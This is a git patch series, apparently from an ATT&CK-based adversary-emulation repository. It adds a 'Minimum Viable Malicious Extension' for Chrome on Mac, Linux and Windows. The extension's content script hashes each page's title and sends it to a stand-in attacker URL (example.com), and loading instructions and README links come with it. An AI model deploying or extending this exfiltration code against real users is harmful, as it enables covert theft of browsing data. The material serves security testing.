From 5d20c6b6dce9c468330b1f0577bf2460e986b89d Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 12:46:47 +1100 Subject: [PATCH 01/10] add a 'minimum viable malicious extension' payload + collection notes for Mac --- Mac/Collection/Browser_Extensions.md | 10 ++++++ Mac/Payloads/Browser_Extension/inline.js | 37 ++++++++++++++++++++ Mac/Payloads/Browser_Extension/manifest.json | 16 +++++++++ 3 files changed, 63 insertions(+) create mode 100644 Mac/Collection/Browser_Extensions.md create mode 100644 Mac/Payloads/Browser_Extension/inline.js create mode 100644 Mac/Payloads/Browser_Extension/manifest.json diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md new file mode 100644 index 00000000..a8b5f435 --- /dev/null +++ b/Mac/Collection/Browser_Extensions.md @@ -0,0 +1,10 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. +Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension] +Then click 'Select' \ No newline at end of file diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js new file mode 100644 index 00000000..15a8e4c7 --- /dev/null +++ b/Mac/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json new file mode 100644 index 00000000..a4243cba --- /dev/null +++ b/Mac/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file From 9d247c281db19f9b34b4baa7b80b01cbdec7cc13 Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 12:46:47 +1100 Subject: [PATCH 02/10] add a 'minimum viable malicious extension' payload + collection notes for Mac --- Mac/Collection/Browser_Extensions.md | 10 ++++++ Mac/Payloads/Browser_Extension/inline.js | 37 ++++++++++++++++++++ Mac/Payloads/Browser_Extension/manifest.json | 16 +++++++++ 3 files changed, 63 insertions(+) create mode 100644 Mac/Collection/Browser_Extensions.md create mode 100644 Mac/Payloads/Browser_Extension/inline.js create mode 100644 Mac/Payloads/Browser_Extension/manifest.json diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md new file mode 100644 index 00000000..a8b5f435 --- /dev/null +++ b/Mac/Collection/Browser_Extensions.md @@ -0,0 +1,10 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. +Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension] +Then click 'Select' \ No newline at end of file diff --git a/Mac/Payloads/Browser_Extension/inline.js b/Mac/Payloads/Browser_Extension/inline.js new file mode 100644 index 00000000..15a8e4c7 --- /dev/null +++ b/Mac/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Mac/Payloads/Browser_Extension/manifest.json b/Mac/Payloads/Browser_Extension/manifest.json new file mode 100644 index 00000000..a4243cba --- /dev/null +++ b/Mac/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file From d203930a36b1efec9ca54a397e179ff02e2fcf3a Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 12:54:52 +1100 Subject: [PATCH 03/10] can't markdown --- Mac/Collection/Browser_Extensions.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md index a8b5f435..a2ad23e7 100644 --- a/Mac/Collection/Browser_Extensions.md +++ b/Mac/Collection/Browser_Extensions.md @@ -6,5 +6,5 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) ### Chrome Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. -Click 'Load unpacked extension...' and navigate to (Browser_Extension)[../Payload/Browser_Extension] +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payload/Browser_Extension/) Then click 'Select' \ No newline at end of file From e99ab35460d70852363f9c25caf74495c0818acf Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 12:55:34 +1100 Subject: [PATCH 04/10] can't markdown --- Mac/Collection/Browser_Extensions.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md index a2ad23e7..f38f59f4 100644 --- a/Mac/Collection/Browser_Extensions.md +++ b/Mac/Collection/Browser_Extensions.md @@ -6,5 +6,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) ### Chrome Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. -Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payload/Browser_Extension/) + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + Then click 'Select' \ No newline at end of file From e52c8a8980a52326e914249109da05cba2d8ec70 Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 13:08:47 +1100 Subject: [PATCH 05/10] finishing mac bits --- Mac/Persistence/Browser_Extensions.md | 12 ++++++++++++ Mac/README.md | 4 ++-- 2 files changed, 14 insertions(+), 2 deletions(-) create mode 100644 Mac/Persistence/Browser_Extensions.md diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Mac/Persistence/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Mac/README.md b/Mac/README.md index 2b7c6cad..457ba910 100644 --- a/Mac/README.md +++ b/Mac/README.md @@ -3,8 +3,8 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |------------------------------|-------------------------------|---------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | -| Browser Extensions | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Browser Extensions | Data Encrypted | Connection Proxy | +| [Browser Extensions](Persistence/Browser_Extensions.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Create Account](Persistence/Create_Account.md) | Launch Daemon | Code Signing | Credentials in Files | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | Dylib Hijacking | Plist Modification | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Exploitation of Vulnerability | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | [Logon Scripts](Persistence/Logon_Scripts.md) | Launchctl | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | | Hidden Files and Directories | Process Injection | Exploitation of Vulnerability | Input Capture | [Network Share Discovery](Discovery/Network_Share_Discovery.md) | Remote File Copy | Local Job Scheduling | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | | LC_LOAD_DYLIB Addition | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | File Deletion | [Input Prompt](Credential_Access/Input_Prompt.md) | [Permission Groups Discovery](Discovery/Permissions_Groups_Discovery.md) | Remote Services | Scripting | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | From e4b8cdb9c20cfc748e61352b85174b1a30e6b427 Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 13:13:39 +1100 Subject: [PATCH 06/10] add linux browser extension docs and payload --- Linux/Collection/Browser_Extensions.md | 12 ++++++ Linux/Payloads/Browser_Extension/inline.js | 37 +++++++++++++++++++ .../Payloads/Browser_Extension/manifest.json | 16 ++++++++ Linux/Persistence/Browser_Extensions.md | 12 ++++++ Linux/README.md | 16 ++++---- 5 files changed, 85 insertions(+), 8 deletions(-) create mode 100644 Linux/Collection/Browser_Extensions.md create mode 100644 Linux/Payloads/Browser_Extension/inline.js create mode 100644 Linux/Payloads/Browser_Extension/manifest.json create mode 100644 Linux/Persistence/Browser_Extensions.md diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Linux/Collection/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Linux/Payloads/Browser_Extension/inline.js b/Linux/Payloads/Browser_Extension/inline.js new file mode 100644 index 00000000..15a8e4c7 --- /dev/null +++ b/Linux/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Linux/Payloads/Browser_Extension/manifest.json b/Linux/Payloads/Browser_Extension/manifest.json new file mode 100644 index 00000000..a4243cba --- /dev/null +++ b/Linux/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Linux/Persistence/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Linux/README.md b/Linux/README.md index 825187fd..7c2cc91c 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -4,14 +4,14 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | -| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | -| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | -| Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding | -| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | -| Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | -| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | -| | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collections/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | +| Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | +| Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | +| Redundant Access | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Trap](Persistence/Trap.md) | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Data from Removable Media | Exfiltration Over Physical Medium | Fallback Channels | +| Valid Accounts | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Input Capture | Scheduled Transfer | Multi-Stage Channels | +| Web Shell | | Install Root Certificate | | System Owner/User Discovery | | | Screen Capture | | Multiband Communication | | | | Masquerading | | | | | | | Multilayer Encryption | | | | Redundant Access | | | | | | | Remote File Copy | | | | Scripting | | | | | | | Standard Application Layer Protocol | From f5c852b834b61a72ab6dd2ceaf117b422ce0fc84 Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 13:14:07 +1100 Subject: [PATCH 07/10] add windows browser extension docs and payload --- Windows/Collection/Browser_Extensions.md | 12 ++++++ Windows/Payloads/Browser_Extension/inline.js | 37 +++++++++++++++++++ .../Payloads/Browser_Extension/manifest.json | 16 ++++++++ Windows/Persistence/Browser_Extensions.md | 12 ++++++ Windows/README.md | 4 +- 5 files changed, 79 insertions(+), 2 deletions(-) create mode 100644 Windows/Collection/Browser_Extensions.md create mode 100644 Windows/Payloads/Browser_Extension/inline.js create mode 100644 Windows/Payloads/Browser_Extension/manifest.json create mode 100644 Windows/Persistence/Browser_Extensions.md diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Windows/Collection/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Windows/Payloads/Browser_Extension/inline.js b/Windows/Payloads/Browser_Extension/inline.js new file mode 100644 index 00000000..15a8e4c7 --- /dev/null +++ b/Windows/Payloads/Browser_Extension/inline.js @@ -0,0 +1,37 @@ +function exfil(str) { + // take the provided string, SHA-256 hash it, then call an attacker-controlled URL with the hash included. + // other options, if you could be bothered writing them, involve dns resolution of sha256(string).attackerdomain.com + // and probably a thousand other methods. But this one is easy. + var buffer = new TextEncoder("utf-8").encode(str); + return crypto.subtle.digest("SHA-256", buffer).then(callUrl); +} + +function callUrl(buffer) { + // this function "exfiltrates" data by making a (404-returning) call to a webserver the attacker controls + // except it's example.com so w/e + var digest = hex(buffer); + var url = "https://example.com/" + digest; + console.log("Exfiltrating data to " + url) + var xmlHttp = new XMLHttpRequest(); + xmlHttp.open( "GET", url, true); + xmlHttp.send( null); + return digest; +} + +function hex(buffer) { + // nicked from https://developer.mozilla.org/en-US/docs/Web/API/SubtleCrypto/digest + var hexCodes = []; + var view = new DataView(buffer); + for (var i = 0; i < view.byteLength; i += 4) { + var value = view.getUint32(i) + var stringValue = value.toString(16) + var padding = '00000000' + var paddedValue = (padding + stringValue).slice(-padding.length) + hexCodes.push(paddedValue); + } + var athing = hexCodes.join(""); + return hexCodes.join(""); +} + +// Obviously a really malicious extension would exfil more interesting stuff than the document title but we're MVP here. +var digest = exfil(document.title); \ No newline at end of file diff --git a/Windows/Payloads/Browser_Extension/manifest.json b/Windows/Payloads/Browser_Extension/manifest.json new file mode 100644 index 00000000..a4243cba --- /dev/null +++ b/Windows/Payloads/Browser_Extension/manifest.json @@ -0,0 +1,16 @@ +{ + "name": "Minimum Viable Malicious Extension", + "description": "Base Level Extension", + "version": "1.0", + "manifest_version": 2, + "content_scripts": [ + { + "matches": [ + "" + ], + "js": [ + "inline.js" + ] + } + ] +} \ No newline at end of file diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md new file mode 100644 index 00000000..f38f59f4 --- /dev/null +++ b/Windows/Persistence/Browser_Extensions.md @@ -0,0 +1,12 @@ +## Browser Extensions + +MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) + + +### Chrome + +Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'. + +Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) + +Then click 'Select' \ No newline at end of file diff --git a/Windows/README.md b/Windows/README.md index 1228cf4b..c1480d8e 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -4,11 +4,11 @@ |-------------------------------------------------------|----------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | Command-Line Interface | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | | AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | Dynamic Data Exchange | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | -| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | Browser Extensions | Data Encrypted | Connection Proxy | +| [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | Logon Scripts | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | | [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | Data Staged | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | -| Browser Extensions | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | From 5dc3e366664c2747cd758349a30d6a79870c67ff Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 13:16:16 +1100 Subject: [PATCH 08/10] typo in README.md --- Linux/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Linux/README.md b/Linux/README.md index 7c2cc91c..504087b8 100644 --- a/Linux/README.md +++ b/Linux/README.md @@ -4,7 +4,7 @@ |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port | | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | -| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collections/Browser_Extensions.md) | Data Encrypted | Connection Proxy | +| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol | | Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol | | Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | From 24412945ce0ad35cb9fb1ca2a2ddf7fc00a0bd00 Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: 